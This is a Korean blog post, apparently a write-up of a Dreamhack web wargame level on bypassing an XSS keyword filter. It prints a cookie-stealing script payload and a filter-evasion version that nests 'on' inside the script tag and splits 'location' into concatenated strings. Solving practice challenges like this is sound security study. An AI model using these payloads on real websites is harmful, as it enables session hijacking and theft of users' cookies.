본문 바로가기

모의해킹/Dreamhack

XSS Filtering Bypass [WEB LEVEL1]

728x90

문제 정보

XSS Filtering Bypass는 웹 내에 XSS 취약점이 존재하지만 웹 방화벽 또는 기타 방어 기법으로 인해 일반적인 공격 기법을 사용할 수 없을 때이다

소스 코드

소스 코드를 보니  script, on, javascript 에 대한 문자가 박혀있으면 필터링되는 소스이다.

 

문제 풀이

저번에 풀었던 XSS 문제처럼 memo경로에 flag 값을 출력시키는 문제이다.

먼저 기본 코드부터 작성을 해보면 <script> window.location.href="/memo? memo="+document.cookie;</script> 구문이다.

이제 여기서 소스코드에 나와있는 필터링 부분을 우회해 페이로드를 작성해 보자.

 

<scronipt> window ['locatio'+'n']. href="/memo? memo="+document.cookie;</scronipt>  구문 

 

** location.href 는 전체 URL을 반환하거나, URL을 업데이트할 수 있는 속성값이다.

** document.cookie 는 해당 페이지에서 사용하는 쿠키를 읽고, 쓰는 속성값이다.

 

문제 풀이

flag 값을 확인할 수 있다.

'모의해킹 > Dreamhack' 카테고리의 다른 글

error based sql injection [WEB LEVEL1]  (0) 2023.04.17
blind sql injection advanced [WEB LEVEL1]  (0) 2023.04.14
session [WEB LEVEL1]  (0) 2023.04.12
web-misconf-1 [WEB LEVEL1]  (0) 2023.04.12
blind-command [WEB LEVEL1]  (0) 2023.04.10